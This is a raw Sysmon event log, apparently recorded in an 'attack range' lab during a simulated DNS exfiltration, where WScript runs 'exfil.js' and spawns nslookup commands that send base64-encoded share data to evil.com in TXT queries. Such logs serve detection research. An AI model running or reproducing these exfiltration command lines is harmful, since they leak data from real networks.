14:16:43.839{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-D341-000000005F02}2520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.839{2E1864BB-17A1-629A-783D-000000005F02}55521660C:\Windows\System32\WScript.exe{2E1864BB-17CB-629A-D341-000000005F02}2520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.853{2E1864BB-17CB-629A-D341-000000005F02}2520C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlszarhd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 22542200x8000000000000000203871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.968{00000000-0000-0000-0000-000000000000}7336evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.863{00000000-0000-0000-0000-000000000000}5480evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.715{00000000-0000-0000-0000-000000000000}8136evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.581{00000000-0000-0000-0000-000000000000}3396evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.455{00000000-0000-0000-0000-000000000000}7320evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.351{00000000-0000-0000-0000-000000000000}7460evil.com0::ffff:127.0.0.1;<unknown process> 23542300x8000000000000000203865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.839{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlglpd.tmpMD5=D1A54A6F21A90F6B3FDD9CFE56E9C930,SHA256=5C5F1828A4B86FD4EE344674F6FC0762ED42C1A295A6FDEB230A8253C2750995,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000203864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.235{00000000-0000-0000-0000-000000000000}5112evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.115{00000000-0000-0000-0000-000000000000}7796evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.968{00000000-0000-0000-0000-000000000000}3336evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.839{00000000-0000-0000-0000-000000000000}5432evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.694{00000000-0000-0000-0000-000000000000}6388evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.569{00000000-0000-0000-0000-000000000000}5608evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.435{00000000-0000-0000-0000-000000000000}2444evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000203857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.777{2E1864BB-17CB-629A-D141-000000005F02}79482336C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-D241-000000005F02}5736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.761{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-D241-000000005F02}5736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.761{2E1864BB-17CB-629A-D041-000000005F02}77487596C:\Windows\system32\cmd.exe{2E1864BB-17CB-629A-D241-000000005F02}5736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.761{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.761{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.761{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.761{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.769{2E1864BB-17CB-629A-D241-000000005F02}5736C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CB-629A-D041-000000005F02}7748C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlglpd.tmp 2>&1 10341000x8000000000000000203849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.739{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-D141-000000005F02}7948C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.739{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-D141-000000005F02}7948C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.739{2E1864BB-17CB-629A-D141-000000005F02}79482336C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-D041-000000005F02}7748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.725{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-D141-000000005F02}7948C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.725{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.725{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.725{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.725{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.708{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-D041-000000005F02}7748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.708{2E1864BB-17A1-629A-783D-000000005F02}55525836C:\Windows\System32\WScript.exe{2E1864BB-17CB-629A-D041-000000005F02}7748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.723{2E1864BB-17CB-629A-D041-000000005F02}7748C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlglpd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.708{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldajwkc.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.677{2E1864BB-17CB-629A-CE41-000000005F02}29526000C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-CF41-000000005F02}3656C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.677{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.677{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.233{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53048- 354300x8000000000000000203833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.233{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53047- 354300x8000000000000000203832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.232{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53046- 354300x8000000000000000203831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.114{00000000-0000-0000-0000-000000000000}7796<unknown process>-udpfalsefalse127.0.0.1-53045-false127.0.0.1-53domain 10341000x8000000000000000203830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 